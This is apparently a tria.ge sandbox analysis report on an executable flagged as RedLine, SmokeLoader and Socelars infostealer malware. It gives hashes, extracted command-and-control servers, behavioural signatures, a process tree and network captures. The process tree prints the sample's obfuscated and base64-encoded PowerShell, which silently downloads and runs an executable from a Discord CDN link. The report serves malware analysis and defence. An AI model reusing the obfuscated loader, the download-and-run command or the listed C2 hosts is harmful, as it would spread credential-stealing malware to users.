Windows 7 deprecation

Windows 7 will be removed from tria.ge on 2025-03-31

Overview

overview

10

Static

static

01a53007f9...68.exe

windows7_x64

10

01a53007f9...68.exe

windows10_x64

10

022e3c30a1...66.exe

windows7_x64

10

022e3c30a1...66.exe

windows10_x64

10

02ca2b5bb7...35.exe

windows7_x64

10

02ca2b5bb7...35.exe

windows10_x64

10

0d69cafe70...cd.exe

windows7_x64

10

0d69cafe70...cd.exe

windows10_x64

10

0df647f0a2...bc.exe

windows7_x64

10

0df647f0a2...bc.exe

windows10_x64

10

1df367eead...2c.exe

windows7_x64

10

1df367eead...2c.exe

windows10_x64

10

1e083736ae...33.exe

windows7_x64

10

1e083736ae...33.exe

windows10_x64

10

1e662d9025...7d.exe

windows7_x64

10

1e662d9025...7d.exe

windows10_x64

10

2010009ff5...59.exe

windows7_x64

10

2010009ff5...59.exe

windows10_x64

10

243379992d...93.exe

windows7_x64

10

243379992d...93.exe

windows10_x64

10

2d63a14e4a...1a.exe

windows7_x64

10

2d63a14e4a...1a.exe

windows10_x64

10

30e6815ae0...51.exe

windows7_x64

1

30e6815ae0...51.exe

windows10_x64

1

364d3b0e94...fa.exe

windows7_x64

10

364d3b0e94...fa.exe

windows10_x64

10

3a4e2dfbd7...00.exe

windows7_x64

10

3a4e2dfbd7...00.exe

windows10_x64

10

4a4a606501...75.exe

windows7_x64

10

4a4a606501...75.exe

windows10_x64

10

4d89b00768...c0.exe

windows7_x64

10

4d89b00768...c0.exe

windows10_x64

10

Resubmissions

10/11/2021, 14:52 UTC

211110-r84p8aedej 10

09/11/2021, 13:19 UTC

211109-qkrv3sfcg4 10

Analysis

  • max time kernel
    167s
  • max time network
    185s
  • platform
    windows7_x64
  • resource
    win7-en-20211104
  • submitted
    09/11/2021, 13:19 UTC

Sharing

Copy URL
Twitter E-mail
Report Analysis Logs

General

  • Target

    4a4a606501eea3b8b9e128412455243ca20de0efe374c9c47ff3b5caac457375.exe

  • Size

    5.0MB

  • MD5

    2b0ce83a2a1065ef402b7a50f45892fd

  • SHA1

    d66a565247f9df9ac0bdb3725eee121e98d8914d

  • SHA256

    4a4a606501eea3b8b9e128412455243ca20de0efe374c9c47ff3b5caac457375

  • SHA512

    42d19f0130d34a3b37e78b6f1ba9c3c7e07d99e0a76dc005be976c51c2a363e64d475b9caa6805d3e8c1da2a4d32020f307eaae68b41d8c815ae1da8ec0db2ca

Score
10/10
redlinesmokeloadersocelars05.10backdoorevasioninfostealerspywarestealertrojan

Malware Config

Extracted

Language
ps1
Source
1
Start-BitsTransfer -Source https://cdn.discordapp.com/attachments/523238636561629190/894846072097218580/ghielufuzymmuibugkhmviaajvfwio.exe -Destination C:\Users\Admin\AppData\Local\Temphkfmxgfdblkdcgixkfksjlgmfkofgu.exe
URLs
exe.dropper

https://cdn.discordapp.com/attachments/523238636561629190/894846072097218580/ghielufuzymmuibugkhmviaajvfwio.exe

Extracted

Family

socelars

C2

http://www.iyiqian.com/

http://www.hbgents.top/

http://www.rsnzhy.com/

http://www.znsjis.top/

Extracted

Family

redline

Botnet

05.10

C2

80.92.205.116:59599

Extracted

Family

smokeloader

Version

2020

C2

http://gmpeople.com/upload/

http://mile48.com/upload/

http://lecanardstsornin.com/upload/

http://m3600.com/upload/

http://camasirx.com/upload/
rc4.i32
1
0x3b22e540
rc4.i32
1
0xa6b397e0

Signatures

  • Modifies Windows Defender Real-time Protection settings 3 TTPs
    evasiontrojan
  • Process spawned unexpected child process 1 IoCs

    This typically indicates the parent process was compromised via an exploit or macro.

  • RedLine

    RedLine Stealer is a malware family written in C#, first appearing in early 2020.

    infostealerredline
  • RedLine Payload 2 IoCs
  • SmokeLoader

    Modular backdoor trojan in use since 2014.

    trojanbackdoorsmokeloader
  • Socelars

    Socelars is an infostealer targeting browser cookies and credit card credentials.

    stealersocelars
  • Socelars Payload 5 IoCs
  • Suspicious use of NtCreateUserProcessOtherParentProcess 1 IoCs
  • Downloads MZ/PE file
  • Executes dropped EXE 12 IoCs
  • Checks computer location settings 2 TTPs 1 IoCs

    Looks up country code configured in the registry, likely geofence.

  • Loads dropped DLL 50 IoCs
  • Reads user/profile data of web browsers 2 TTPs

    Infostealers often target stored browser data, which can include saved credentials etc.

    spywarestealer
  • Checks whether UAC is enabled 1 TTPs 1 IoCs
    evasiontrojan
  • Legitimate hosting services abused for malware hosting/C2 1 TTPs
  • Looks up external IP address via web service 3 IoCs

    Uses a legitimate IP lookup service to find the infected system's external IP.

  • Drops file in System32 directory 11 IoCs
  • Suspicious use of SetThreadContext 1 IoCs
  • Drops file in Windows directory 1 IoCs
  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.

  • Program crash 1 IoCs
  • Checks SCSI registry key(s) 3 TTPs 3 IoCs

    SCSI information is often read in order to detect sandboxing environments.

  • Checks processor information in registry 2 TTPs 2 IoCs

    Processor information is often read in order to detect sandboxing environments.

  • Modifies Internet Explorer settings 1 TTPs 35 IoCs
    adwarespyware
  • Modifies data under HKEY_USERS 64 IoCs
  • Modifies registry class 16 IoCs
  • Modifies system certificate store 2 TTPs 3 IoCs
    evasionspywaretrojan
  • Suspicious behavior: EnumeratesProcesses 64 IoCs
  • Suspicious behavior: GetForegroundWindowSpam 2 IoCs
  • Suspicious behavior: MapViewOfSection 1 IoCs
  • Suspicious use of AdjustPrivilegeToken 34 IoCs
  • Suspicious use of FindShellTrayWindow 5 IoCs
  • Suspicious use of SendNotifyMessage 2 IoCs
  • Suspicious use of SetWindowsHookEx 6 IoCs
  • Suspicious use of WriteProcessMemory 64 IoCs

Processes

  • C:\Windows\system32\services.exe
    C:\Windows\system32\services.exe
    1⤵
      PID:464
      • C:\Windows\system32\svchost.exe
        C:\Windows\system32\svchost.exe -k netsvcs
        2⤵
        • Suspicious use of NtCreateUserProcessOtherParentProcess
        • Drops file in System32 directory
        • Suspicious use of SetThreadContext
        • Drops file in Windows directory
        • Modifies registry class
        • Suspicious behavior: EnumeratesProcesses
        • Suspicious use of AdjustPrivilegeToken
        • Suspicious use of WriteProcessMemory
        PID:880
      • C:\Windows\system32\svchost.exe
        C:\Windows\system32\svchost.exe -k SystemNetworkService
        2⤵
        • Drops file in System32 directory
        • Checks processor information in registry
        • Modifies data under HKEY_USERS
        • Modifies registry class
        PID:1976
    • C:\Users\Admin\AppData\Local\Temp\4a4a606501eea3b8b9e128412455243ca20de0efe374c9c47ff3b5caac457375.exe
      "C:\Users\Admin\AppData\Local\Temp\4a4a606501eea3b8b9e128412455243ca20de0efe374c9c47ff3b5caac457375.exe"
      1⤵
      • Loads dropped DLL
      • Suspicious use of WriteProcessMemory
      PID:1516
      • C:\Users\Admin\AppData\Local\Temp\Graphics.exe
        "C:\Users\Admin\AppData\Local\Temp\Graphics.exe"
        2⤵
        • Executes dropped EXE
        • Loads dropped DLL
        • Checks whether UAC is enabled
        • Suspicious use of WriteProcessMemory
        PID:820
        • C:\Users\Admin\AppData\Local\Temp\RarSFX0\Graphicss.exe
          "C:\Users\Admin\AppData\Local\Temp\RarSFX0\Graphicss.exe"
          3⤵
          • Executes dropped EXE
          • Suspicious use of AdjustPrivilegeToken
          • Suspicious use of WriteProcessMemory
          PID:1700
          • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
            "powershell.exe" [StriNG]::JOiN('', ( '20<22>24T28>73T45T54O2dr69T74O65O6dr20r20T27<56<61O72>49T41>42r6c~45j3ar6f<66O53j27O20O27~27>20~29j20~22%2b>5b>53%54O72%49j6er67j5d>28<20<27r32T34O47O37T35r2dj37O32r7er36~63<57<36r34>59O32O30%47T33~64O2d<32%30%7eO32%37>2dr36~38%7ej37%34>3b%37r34<57%37%30%2dO37T33O6fT33>61<3b<32T66T47T32j66>47O36j33O59O36j34>7e<36<65r48<32~65j57~36<34>7e<36r39O48~37<33O47T36%33r48~36j66r7ej37r32~48>36r34~47>36r31O3b~37T30j48T37<30O48>32>65T48O36%33j48j36<66T47<36%64O2d%32j66~3br36T31j59<37%34j47~37<34O59O36~31<3b~36r33T48~36~38>6fj36>64<57~36%35r3bO36>65<48O37j34j59j37%33r7ej32O66T57%33%35T47T33~32%7er33r33<2dT33O32T6f<33<33r3b<33%38O59O33j36~59O33~33>3bT33>36O6f>33%35r57<33T36%7ej33j31j57~33~36j57%33T32~47O33O39>47~33%31r57<33~39T7e<33<30j3b<32%66r7e>33j38T6fj33j39<48O33~34r3br33T38<57T33T34<57j33~36~6fr33O30T7e<33~37r48O33<32%59~33r30O2dT33T39>47O33>37T48r33O32O2dr33<31j48r33%38j47<33%35%7e%33O38O48>33T30<3br32j66T57r36O37r3b~36O38j57>36T39j48T36<35j57<36T63~2d>37~35T59O36>36%2dO37~35r2dT37<61<3br37>39j48O36r64O6f%36%64~48T37T35<3br36O39>47>36O32>6f%37r35<7e>36%37j57O36O62%47O36T38O7e<36~64~2dj37r36>59j36j39T48O36>31O59%36O31T59r36O61O2d<37r36>3bj36<36~6f~37T37r6fr36%39%59~36r66~6f>32r65~47%36T35r3b<37r38j6fT36>35O7e>32j37j6fO33%62>59%32r34%2dO37%30>59O36>31O48j37T34O7ej36>38r6fr32<30<7e>33j64r57j32O30r6f>32%34j3b%36%35<2d>36%65T6fO37<36j3bT33r61~3b>35j34%48r34>35<59<34O64%2dj35j30>59%32~62>3b%32%32r59<36O38T2dr36%62~6f~36O36~2dO36O64j57%37~38r6f~36>37%59r36T36<48r36<34>3bj36j32r59T36~63O47j36r62>2dj36r34O47r36r33~59<36<37r3bj36<39~7e<37T38T48T36%62O57r36O36T47r36j62~59O37<33>2d<36O61~3bT36r63r2dr36j37T3b%36O64T7e~36O36j57T36>62O7er36>66<57~36T36j57r36j37j2dj37>35<7e<32j65%2dj36>35>7er37>38%59>36j35T47j32>32>47<33r62r57j32j34r7e~37%33>59O36<33r57~37r32O48j36r39O6f>37<30>2d~37r34O57O37T32j3bj37>35r2dj36O65>57r32~30%2dr33j64~57~32~30j7eO32>32>59%37r30T2dj36T66j48T37j37>6fO36<35<57<37j32r6fr37j33T2dr36>38<48>36T35~7eO36<63<59<36<63~7er32%65<3bT36<35T3b~37T38~3br36j35r3b<32j30~57~32<64T2d%36%33T3bO36>66~7e>36<64O59O36T64T59%36j31~47>36j65>48>36~34O7eT32T30T57O35T30<2dT36%66<3bj37j37>48<36O35~48T37>32%47%35>33~6f~36r38>57T36%35T48<36r63~2d>36j63~6fj32<30<3bT32%64j47<34j35T2dj37~38>7er36~35<6f>36j33%59T37O35<57T37j34j3b<36O39>2d>36T66T3b%36O65j3bO35<30~47~36r66j2d>36%63r59~36%39r2d<36T33>2dj37T39~59~32O30O57<36r32<48O37r39j47~37~30>6f>36T31<6fO37r33~3bj37<33T2d~32>30O48j32r64>48j36~65%48%36r66<3bO37>30<2dr37r32>48%36r66O2dT36>36O2d<36>39>59T36j63<3b>36<35r3bT32<30O47>32>64>3bj37<37>47>36%39<48j36~65>2d<36%34r6fj36~66r7er37>37O57r37~33T57O37r34<6f~37<39~3b>36~63j48<36>35%57<32>30>48r36T38O7eO36j39<7e<36r34j57T36<34O59O36j35T7e>36<65%59%32O30>47<32j64r3br36r33T6fj36O66~7e~36%64j59T36%64<48%36>31r3br36j65j3b~36>34j7eO32~30~48>35<33<47O37<34>47~36%31%2dj37j32>2dr37%34T7ej32r64~6fO34>32%3bO36%39T48~37j34T48O37>33%3b%35<34>48T37O32>48<36<31T2d~36T65r48j37>33T7e~36r36r7er36>35j3bj37O32<7e%32T30<48O32%64j47j35>33j6f>36r66<57>37O35T6f%37>32O57r36O33T3br36r35O57r32T30j59<32j34O47T37>35%48>37>32~47<36~63%7e~36r34O3br32~30~6fO32j64>6fr34r34<3b%36j35T47%37%33>47<37r34r3bj36O39~47%36j65~3b%36<31j47T37T34%48O36j39r3bj36>66O6f>36O65O2d>32%30>3bT32%34~59<37T30~7e~36<31~47<37~34j59%36>38>7e~33r62%59<32~32<47O33~62<3bO32~34~2d<36%32j7eT36~31%57%37T33>7eT36O35O7ej33j36~2d>33>34j2d>32~30O48<33j64>3b%32T30j59>35<62~2d<34O33T3b>36%66%2d%36%65O7ej37O36r57T36T35O48O37%32j7eO37r34~47r35O64j57r33j61r3b>33O61r2d<35r34r7eO36~66T6fO34r32<47%36O31>7e%37T33<47~36O35r2dO33j36O6f~33r34T7er35<33<7e<37O34j3bT37<32~48r36j39O2dr36>65%7e>36T37<2d<32<38j59%35<62O57r35<33T2d>37r39%57~37T33<57%37T34>3b~36T35r48>36r64O57>32r65O2dj35r34O59~36T35r59r37<38r47>37j34r7eO32O65%47<34O35<7er36%65<3bT36r33<7er36j66>59r36~34>6f%36%39j6fO36%65>6f<36>37r2d~35~64j6f>33T61j3br33j61T7e>35j35T6fT36T65<2dT36<39<6f%36<33~7e<36T66~6f>36T34O6f>36O35T2dr32j65O3b~34j37T6fj36%35%48%37T34<57j34~32%6fr37<39T3bO37j34T48>36<35~6f%37T33j2d>32%38O3bj32r34<57O37<33~59~36r33~47~37<32r57%36j39r59<37%30~47~37%34~3b<37j32>47j37r35O48O36T65O2dT32%39<7eT32<39O7e%33j62O47%37%37<48j36%38<7e<36O39T47%36>63~48O36T35~47O32%30>48%32O38<6f%32>31~6fO35r62<47T35<33O3br37%39%48<37O33~7er37O34O2dO36<35<59j36<64~47T32O65<6fj34T39T48r34r66r6f<32%65O2d~34%36r2dj36%39>47T36O63T59j36j35<2d<35~64<6fO33~61r3b>33>61>47~34j35O48>37O38r3b~36O39%6fr37O33~47j37>34>57r37%33T2d>32~38>7e~32r34~6f>37~30%57O36j31%47O37j34%59T36<38~57>32%39~59O32O39<47r37%62O57r32<30T47j34~39%48~34<35%3bj35~38%59j32O30O48O32%32r3b>37>30>3br36%66<47O37<37T7ej36%35r57<37O32j59O37j33~2d%36~38>59<36~35%3b%36~63%48~36T63O48<32r30r59%32j64r2d%34j35%3b~32>30>3b~32<34%3b<36j32<3b<36r31%3b<37<33~48O36r35~3b>33~36%6fO33%34~59%32%32j57<33T62T3bT32>30r7e%36~32T47T37%32O3bj36%35>6fO36~31~6fj36r62~7ej33>62~3bj32j30<47j37T64>2dT32j30%6f<35>33<3bT37%34~47T36r31<6f<37O32T57~37T34j6fT32%64j3b<35T30r57~37O32%59T36>66O48T36T33T6f~36O35>47T37~33%47~37<33<2d~32O38>47j32r34O6fj36T35j48r36~65r3br37<36T59%33>61j48<35~34~59>34%35j48T34O64%57r35>30>48<32%62<57T32T37<3bO36%38O6fj36j62O7er36T36T48%36<64~47>37T38O7ej36T37j48>36~36r48<36j34>7e~36<32<3br36~63<3b~36~62~47<36T34<2dr36O33T7eT36T37T6f~36~39<48T37r38r57T36<62j59%36%36T7ej36T62O2d>37O33<2dT36>61<48~36O63O59j36O37%59T36T64j7e<36r36>3bT36T62%2d>36r66~48r36r36~3b<36j37r6fr37O35O48O32j65r7e>36O35r7eO37r38r3br36T35j48%32~37>59T32>39%3b~33~62>27O20~2dT53~70r6cO69%74>20O27<57T27>20~2dO73r70j4cj69<54O20O27~6fT27%2dr53~50r6cO49j54r27%48<27>2d~53T50r4c~49>54%20r27j2dT27<2dr53~50~4c~69O54~27<7ej27~2dr53>70%4cT49r54r20r27O59~27~20~2d>73O70T4cT49>54<27<47O27<20<2d%53>50O4cr69~54T27%3b<27<7c%46j6fT72%45>41%43%68>7b%20r28%20~5bT63%6fT6e~76>65>52<74%5d<3aj3a%54>4fO69<6e>74%31j36j28~20%28<20j24<5fj2e>74r6fT53>54<72>69<4e<67<28r29<20~29O20j2cj20O31O36>20%29%2d>41j73O20r5bj43T48T61<52r5d<29~20<7dT20r29j20>2b%22~24~28O20~73%76j20<27>6fT66j53%27<20r20~27r20r27T29T22T20O7cT69~6e~76r6fr4br45r2dj45O58%50>52%45%53<73~49<6f<4e' -Split'<'-spLIT'j'-SpliT '~'-Split'O'-SpLIT 'r' -SPlIT'>'-SpLIT 'T'-SpLIt '%'|foReACH{( [CHaR] ([CoNveRt]::tOINT16(( $_.TosTRiNG() ) ,16 ))) } ))|& ( $VErBOSEPrEfErence.TosTRinG()[1,3]+'X'-JoiN'')
            4⤵
            • Suspicious behavior: EnumeratesProcesses
            • Suspicious use of AdjustPrivilegeToken
            PID:1836
            • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
              "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -E cABvAHcAZQByAHMAaABlAGwAbAAuAGUAeABlACAALQBjAG8AbQBtAGEAbgBkACAAUABvAHcAZQByAFMAaABlAGwAbAAgAC0ARQB4AGUAYwB1AHQAaQBvAG4AUABvAGwAaQBjAHkAIABiAHkAcABhAHMAcwAgAC0AbgBvAHAAcgBvAGYAaQBsAGUAIAAtAHcAaQBuAGQAbwB3AHMAdAB5AGwAZQAgAGgAaQBkAGQAZQBuACAALQBjAG8AbQBtAGEAbgBkACAAUwB0AGEAcgB0AC0AQgBpAHQAcwBUAHIAYQBuAHMAZgBlAHIAIAAtAFMAbwB1AHIAYwBlACAAaAB0AHQAcABzADoALwAvAGMAZABuAC4AZABpAHMAYwBvAHIAZABhAHAAcAAuAGMAbwBtAC8AYQB0AHQAYQBjAGgAbQBlAG4AdABzAC8ANQAyADMAMgAzADgANgAzADYANQA2ADEANgAyADkAMQA5ADAALwA4ADkANAA4ADQANgAwADcAMgAwADkANwAyADEAOAA1ADgAMAAvAGcAaABpAGUAbAB1AGYAdQB6AHkAbQBtAHUAaQBiAHUAZwBrAGgAbQB2AGkAYQBhAGoAdgBmAHcAaQBvAC4AZQB4AGUAIAAtAEQAZQBzAHQAaQBuAGEAdABpAG8AbgAgAEMAOgBcAFUAcwBlAHIAcwBcAEEAZABtAGkAbgBcAEEAcABwAEQAYQB0AGEAXABMAG8AYwBhAGwAXABUAGUAbQBwAGgAawBmAG0AeABnAGYAZABiAGwAawBkAGMAZwBpAHgAawBmAGsAcwBqAGwAZwBtAGYAawBvAGYAZwB1AC4AZQB4AGUAOwA=
              5⤵
              • Suspicious use of AdjustPrivilegeToken
              PID:2312
              • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command PowerShell -ExecutionPolicy bypass -noprofile -windowstyle hidden -command Start-BitsTransfer -Source https://cdn.discordapp.com/attachments/523238636561629190/894846072097218580/ghielufuzymmuibugkhmviaajvfwio.exe -Destination C:\Users\Admin\AppData\Local\Temphkfmxgfdblkdcgixkfksjlgmfkofgu.exe
                6⤵
                • Suspicious use of AdjustPrivilegeToken
                PID:2572
                • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                  "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy bypass -noprofile -windowstyle hidden -command Start-BitsTransfer -Source https://cdn.discordapp.com/attachments/523238636561629190/894846072097218580/ghielufuzymmuibugkhmviaajvfwio.exe -Destination C:\Users\Admin\AppData\Local\Temphkfmxgfdblkdcgixkfksjlgmfkofgu.exe
                  7⤵
                  • Suspicious use of AdjustPrivilegeToken
                  PID:2728
      • C:\Users\Admin\AppData\Local\Temp\FoxSBrowser.exe
        "C:\Users\Admin\AppData\Local\Temp\FoxSBrowser.exe"
        2⤵
        • Executes dropped EXE
        • Suspicious use of AdjustPrivilegeToken
        PID:1884
      • C:\Users\Admin\AppData\Local\Temp\Process.exe
        "C:\Users\Admin\AppData\Local\Temp\Process.exe"
        2⤵
        • Executes dropped EXE
        PID:1404
      • C:\Users\Admin\AppData\Local\Temp\md9_1sjm.exe
        "C:\Users\Admin\AppData\Local\Temp\md9_1sjm.exe"
        2⤵
        • Executes dropped EXE
        • Suspicious use of AdjustPrivilegeToken
        PID:1492
      • C:\Users\Admin\AppData\Local\Temp\Install.exe
        "C:\Users\Admin\AppData\Local\Temp\Install.exe"
        2⤵
        • Executes dropped EXE
        PID:992
      • C:\Users\Admin\AppData\Local\Temp\Folder.exe
        "C:\Users\Admin\AppData\Local\Temp\Folder.exe"
        2⤵
        • Executes dropped EXE
        PID:1952
      • C:\Users\Admin\AppData\Local\Temp\Files.exe
        "C:\Users\Admin\AppData\Local\Temp\Files.exe"
        2⤵
        • Executes dropped EXE
        PID:1736
      • C:\Users\Admin\AppData\Local\Temp\File.exe
        "C:\Users\Admin\AppData\Local\Temp\File.exe"
        2⤵
        • Executes dropped EXE
        • Checks computer location settings
        • Loads dropped DLL
        • Modifies system certificate store
        • Suspicious behavior: EnumeratesProcesses
        • Suspicious use of WriteProcessMemory
        PID:1040
        • C:\Users\Admin\Pictures\Adobe Films\MwQRXOmgQ5eY9M3tTDamT97_.exe
          "C:\Users\Admin\Pictures\Adobe Films\MwQRXOmgQ5eY9M3tTDamT97_.exe"
          3⤵
          • Executes dropped EXE
          • Suspicious behavior: EnumeratesProcesses
          PID:824
        • C:\Windows\SysWOW64\WerFault.exe
          C:\Windows\SysWOW64\WerFault.exe -u -p 1040 -s 1108
          3⤵
          • Loads dropped DLL
          • Program crash
          • Suspicious behavior: GetForegroundWindowSpam
          • Suspicious use of AdjustPrivilegeToken
          PID:2924
      • C:\Users\Admin\AppData\Local\Temp\Details.exe
        "C:\Users\Admin\AppData\Local\Temp\Details.exe"
        2⤵
        • Executes dropped EXE
        PID:1768
      • C:\Users\Admin\AppData\Local\Temp\pub2.exe
        "C:\Users\Admin\AppData\Local\Temp\pub2.exe"
        2⤵
        • Executes dropped EXE
        • Checks SCSI registry key(s)
        • Suspicious behavior: EnumeratesProcesses
        • Suspicious behavior: MapViewOfSection
        PID:1656
    • C:\Windows\SysWOW64\rundll32.exe
      rUNdlL32.eXe "C:\Users\Admin\AppData\Local\Temp\sqlite.dll",global
      1⤵
      • Loads dropped DLL
      • Modifies registry class
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious use of AdjustPrivilegeToken
      • Suspicious use of WriteProcessMemory
      PID:968
    • C:\Windows\system32\rUNdlL32.eXe
      rUNdlL32.eXe "C:\Users\Admin\AppData\Local\Temp\sqlite.dll",global
      1⤵
      • Process spawned unexpected child process
      • Suspicious use of WriteProcessMemory
      PID:1052
    • C:\Program Files\Internet Explorer\iexplore.exe
      "C:\Program Files\Internet Explorer\iexplore.exe" -Embedding
      1⤵
      • Modifies Internet Explorer settings
      • Suspicious use of FindShellTrayWindow
      • Suspicious use of SetWindowsHookEx
      PID:1760
      • C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE
        "C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE" SCODEF:1760 CREDAT:275457 /prefetch:2
        2⤵
        • Modifies Internet Explorer settings
        • Suspicious use of SetWindowsHookEx
        PID:2536

    Network

    • flag-nl
      GET
      http://45.133.1.107/server.txt
      File.exe
      Remote address:
      45.133.1.107:80
      Request
      GET /server.txt HTTP/1.1
      Connection: Keep-Alive
      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/93.0.4577.63 Safari/537.36
      Host: 45.133.1.107
      Response
      HTTP/1.1 200 OK
      Date: Tue, 09 Nov 2021 13:23:04 GMT
      Server: Apache/2.4.41 (Ubuntu)
      Last-Modified: Thu, 04 Nov 2021 12:32:45 GMT
      ETag: "13-5cff5b943f0c1"
      Accept-Ranges: bytes
      Content-Length: 19
      Keep-Alive: timeout=5, max=100
      Connection: Keep-Alive
      Content-Type: text/plain
    • flag-ru
      GET
      http://186.2.171.3/seemorebty/il.php?e=md9_1sjm
      md9_1sjm.exe
      Remote address:
      186.2.171.3:80
      Request
      GET /seemorebty/il.php?e=md9_1sjm HTTP/1.1
      Connection: Keep-Alive
      Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image webp,image apng, q=0.8,application signed-exchange v=b3
      Accept-Language: en-US,en;q=0.9
      Referer: https://www.facebook.com
      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit 537.36 (KHTML, like Gecko) Chrome 70.0.3538.110 Safari 537.36
      Host: 186.2.171.3
      Response
      HTTP/1.1 200 OK
      Server: ddos-guard
      Connection: keep-alive
      Keep-Alive: timeout=60
      Set-Cookie: __ddg1=X0aBjN8Wn60Cos7m0ume; Domain=.171.3; HttpOnly; Path=/; Expires=Wed, 09-Nov-2022 13:23:04 GMT
      Date: Tue, 09 Nov 2021 13:22:15 GMT
      Upgrade: h2
      Vary: Accept-Encoding
      Content-Type: text/html; charset=UTF-8
      Transfer-Encoding: chunked
    • flag-us
      DNS
      iplogger.org
      IEXPLORE.EXE
      Remote address:
      8.8.8.8:53
      Request
      iplogger.org
      IN A
      Response
      iplogger.org
      IN A
      88.99.66.31
    • flag-nl
      GET
      http://212.192.241.15/base/api/statistics.php
      File.exe
      Remote address:
      212.192.241.15:80
      Request
      GET /base/api/statistics.php HTTP/1.1
      Connection: Keep-Alive
      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/93.0.4577.63 Safari/537.36
      Host: 212.192.241.15
      Response
      HTTP/1.1 200 OK
      Date: Tue, 09 Nov 2021 13:23:04 GMT
      Server: Apache/2.4.47 (Win64) OpenSSL/1.1.1k PHP/7.3.28
      X-Powered-By: PHP/7.3.28
      Content-Length: 94
      Keep-Alive: timeout=5, max=100
      Connection: Keep-Alive
      Content-Type: text/html; charset=UTF-8
    • flag-de
      GET
      https://iplogger.org/Zm8g4
      md9_1sjm.exe
      Remote address:
      88.99.66.31:443
      Request
      GET /Zm8g4 HTTP/1.1
      Connection: Keep-Alive
      Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image webp,image apng, q=0.8,application signed-exchange v=b3
      Accept-Language: en-US,en;q=0.9
      Referer: https://www.facebook.com
      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit 537.36 (KHTML, like Gecko) Chrome 70.0.3538.110 Safari 537.36
      Host: iplogger.org
      Response
      HTTP/1.1 200 OK
      Server: nginx
      Date: Tue, 09 Nov 2021 13:23:09 GMT
      Content-Type: image/png
      Transfer-Encoding: chunked
      Connection: keep-alive
      Set-Cookie: PHPSESSID=ann91dcq03hi9idum3nkgh8mc4; path=/; HttpOnly
      Pragma: no-cache
      Set-Cookie: clhf03028ja=154.61.71.51; expires=Wed, 18-Jul-2029 05:49:51 GMT; Max-Age=242584002; path=/
      Set-Cookie: timezone=deleted; expires=Thu, 01-Jan-1970 00:00:01 GMT; Max-Age=0; path=/
      Set-Cookie: timezone=deleted; expires=Thu, 01-Jan-1970 00:00:01 GMT; Max-Age=0; path=/
      Cache-Control: no-cache
      Expires: Thu, 01 Jan 1970 00:00:01 GMT
      Answers:
      whoami: 5f6f374a2d0823068d51889a32317054977c188115fe1c6b1b8e036330756be6
      Strict-Transport-Security: max-age=31536000; preload
      X-Frame-Options: DENY
    • flag-us
      DNS
      ip-api.com
      SystemNetworkService
      Remote address:
      8.8.8.8:53
      Request
      ip-api.com
      IN A
      Response
      ip-api.com
      IN A
      208.95.112.1
    • flag-us
      GET
      http://ip-api.com/json/
      Files.exe
      Remote address:
      208.95.112.1:80
      Request
      GET /json/ HTTP/1.1
      Connection: Keep-Alive
      Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
      Accept-Language: en,q=0.9;q=0.8,ja;q=0.7,af;q=0.6,am;q=0.5,sq;q=0.4,ar;q=0.3,an;q=0.2,hy;q=0.1,ast;q=0.1,az;q=0.1,bn;q=0.1,eu;q=0.1
      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/87.0.4280.88 Safari/537.36 Edg/87.0.664.60
      viewport-width: 1920
      Host: ip-api.com
      Response
      HTTP/1.1 200 OK
      Date: Tue, 09 Nov 2021 13:23:07 GMT
      Content-Type: application/json; charset=utf-8
      Content-Length: 323
      Access-Control-Allow-Origin: *
      X-Ttl: 46
      X-Rl: 43
    • flag-us
      DNS
      toa.mygametoa.com
      SystemNetworkService
      Remote address:
      8.8.8.8:53
      Request
      toa.mygametoa.com
      IN A
      Response
      toa.mygametoa.com
      IN A
      34.64.183.91
    • flag-us
      DNS
      toa.mygametoa.com
      SystemNetworkService
      Remote address:
      8.8.8.8:53
      Request
      toa.mygametoa.com
      IN AAAA
      Response
    • flag-us
      DNS
      cdn.discordapp.com
      Graphicss.exe
      Remote address:
      8.8.8.8:53
      Request
      cdn.discordapp.com
      IN A
      Response
      cdn.discordapp.com
      IN A
      162.159.135.233
      cdn.discordapp.com
      IN A
      162.159.134.233
      cdn.discordapp.com
      IN A
      162.159.130.233
      cdn.discordapp.com
      IN A
      162.159.133.233
      cdn.discordapp.com
      IN A
      162.159.129.233
    • flag-us
      GET
      https://cdn.discordapp.com/attachments/891021838312931420/906790845167063140/PL_Client.bmp
      File.exe
      Remote address:
      162.159.135.233:443
      Request
      GET /attachments/891021838312931420/906790845167063140/PL_Client.bmp HTTP/1.1
      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/93.0.4577.63 Safari/537.36
      Host: cdn.discordapp.com
      Cache-Control: no-cache
      Response
      HTTP/1.1 200 OK
      Date: Tue, 09 Nov 2021 13:23:11 GMT
      Content-Type: image/x-ms-bmp
      Content-Length: 1335812
      Connection: keep-alive
      CF-Ray: 6ab75aab19f94c8b-AMS
      Accept-Ranges: bytes
      Age: 197948
      Cache-Control: public, max-age=31536000
      Content-Disposition: attachment;%20filename=PL_Client.bmp
      ETag: "74ad528eb7a59567e745fd4894f2d458"
      Expires: Wed, 09 Nov 2022 13:23:11 GMT
      Last-Modified: Sun, 07 Nov 2021 06:23:04 GMT
